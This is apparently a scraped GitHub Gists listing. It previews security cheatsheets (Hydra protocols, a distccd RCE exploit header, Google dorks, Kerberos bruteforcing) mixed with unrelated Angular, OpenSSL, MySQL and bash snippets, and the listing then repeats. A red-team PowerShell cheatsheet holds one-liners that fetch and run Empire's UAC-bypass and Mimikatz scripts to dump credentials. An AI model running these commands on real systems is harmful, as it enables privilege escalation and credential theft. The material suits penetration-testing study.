Alessandra Zullo AlessandraZullo

## OSCP_Password_Cracking.md

      
              5 files
            
          
              3 forks
            
          
              10 comments
            
          
              14 stars
            
          
                ssstonebraker
                / OSCP_Password_Cracking.md
            
            
              Last active
              February 8, 2024 06:33
            
          
    Hydra

Supported protocols


List1
list2
list3
list4
list5


asterisk
icq
oracle-listener
rexec
snmp


cisco
imap[s]
oracle-sid
rlogin
socks5


cisco-enable
irc
pcanywhere
rpcap
ssh


## distccd_rce_CVE-2004-2687.py
# -*- coding: utf-8 -*-

'''
	distccd v1 RCE (CVE-2004-2687)

	This exploit is ported from a public Metasploit exploit code :
		https://www.exploit-db.com/exploits/9915

	The goal of that script is to avoid using Metasploit and to do it manually. (OSCP style)

## GoogleDorking.md

      
              1 file
            
          
              401 forks
            
          
              50 comments
            
          
              1506 stars
            
          
                sundowndev
                / GoogleDorking.md
            
            
              Last active
              April 25, 2024 00:26
            
              
                Google dork cheatsheet
              
          
    Google dork cheatsheet

Search filters


Filter
Description
Example


allintext
Searches for occurrences of all the keywords given.
allintext:"keyword"


intext
Searches for the occurrences of keywords all at once or one at a time.
intext:"keyword"


inurl
Searches for a URL matching one of the keywords.
inurl:"keyword"


allinurl
Searches for a URL matching all the keywords in the query.
allinurl:"keyword"


intitle
Searches for occurrences of keywords in title all or one.
intitle:"keyword"


## kerberos_attacks_cheatsheet.md

      
              1 file
            
          
              373 forks
            
          
              5 comments
            
          
              1084 stars
            
          
                TarlogicSecurity
                / kerberos_attacks_cheatsheet.md
            
            
              Created
              May 14, 2019 13:33
            
              
                A cheatsheet with commands that can be used to perform kerberos attacks
              
          
    Kerberos cheatsheet

Bruteforcing

With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:

  
## RedTeam_CheatSheet.ps1
# Description:
#    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands

## wordlist.txt
index.html
robots.txt
favicon.ico
Makefile
.gitignore
404.html
index.js
README.md
500.html
422.html

## Angular2 -Tutorial Base.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              1 star
            
          
                enricosoft
                / Angular2 -Tutorial Base.md
            
            
              Last active
              February 13, 2019 16:33
            
              
                Angular2 -Tutorial Base
              
          
    QUICKSTART INTRO
Le applicazioni Angular2 sono sviluppate sul concetto di "componenti" che sono una combinazione di un template HTML ed una classe dedicata al componente.
Un componente controlla una porzione della pagina.
Di seguito un esempio di implementazione di un componente:
import { Component } from '@angular/core';


## self-signed-certificate-with-custom-ca.md

      
              1 file
            
          
              421 forks
            
          
              50 comments
            
          
              1349 stars
            
          
                fntlnz
                / self-signed-certificate-with-custom-ca.md
            
            
              Last active
              April 19, 2024 12:30
            
              
                Self Signed Certificate with Custom Root CA
              
          
    Create Root CA (Done once)

Create Root Key

Attention: this is the key used to sign the certificate requests, anyone holding this can sign certificates on your behalf. So keep it in a safe place!
openssl genrsa -des3 -out rootCA.key 4096

  
## README.md

      
              3 files
            
          
              1105 forks
            
          
              77 comments
            
          
              2962 stars
            
          
                hofmannsven
                / README.md
            
            
              Last active
              April 19, 2024 11:45
            
              
                MySQL CLI Cheatsheet
              
          
    MySQL

Getting started


http://www.sqlteaching.com/
https://www.codecademy.com/learn/learn-sql
https://www.codecademy.com/catalog/language/sql

Related tutorials


MySQL-CLI
Analyzing Business Metrics


## hsb.txt

       The following paragraphs describe how bash executes
       its startup files.  If any of the files  exist  but
       cannot  be read, bash reports an error.  Tildes are
       expanded in file names  as  described  below  under
       Tilde Expansion in the EXPANSION section.

       When bash is invoked as an interactive login shell,
       or as a  non-interactive  shell  with  the  --login
       option,  it  first reads and executes commands from
List1	list2	list3	list4	list5
asterisk	icq	oracle-listener	rexec	snmp
cisco	imap[s]	oracle-sid	rlogin	socks5
cisco-enable	irc	pcanywhere	rpcap	ssh
	# -- coding: utf-8 --

	'''
	distccd v1 RCE (CVE-2004-2687)

	This exploit is ported from a public Metasploit exploit code :
	https://www.exploit-db.com/exploits/9915

	The goal of that script is to avoid using Metasploit and to do it manually. (OSCP style)
Filter	Description	Example
allintext	Searches for occurrences of all the keywords given.	`allintext:"keyword"`
intext	Searches for the occurrences of keywords all at once or one at a time.	`intext:"keyword"`
inurl	Searches for a URL matching one of the keywords.	`inurl:"keyword"`
allinurl	Searches for a URL matching all the keywords in the query.	`allinurl:"keyword"`
intitle	Searches for occurrences of keywords in title all or one.	`intitle:"keyword"`
	# Description:
	# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

	# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

	# Invoke-Mimikatz: Dump credentials from memory
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

	# Import Mimikatz Module to run further commands
	index.html
	robots.txt
	favicon.ico
	Makefile
	.gitignore
	404.html
	index.js
	README.md
	500.html
	422.html

	The following paragraphs describe how bash executes
	its startup files. If any of the files exist but
	cannot be read, bash reports an error. Tildes are
	expanded in file names as described below under
	Tilde Expansion in the EXPANSION section.

	When bash is invoked as an interactive login shell,
	or as a non-interactive shell with the --login
	option, it first reads and executes commands from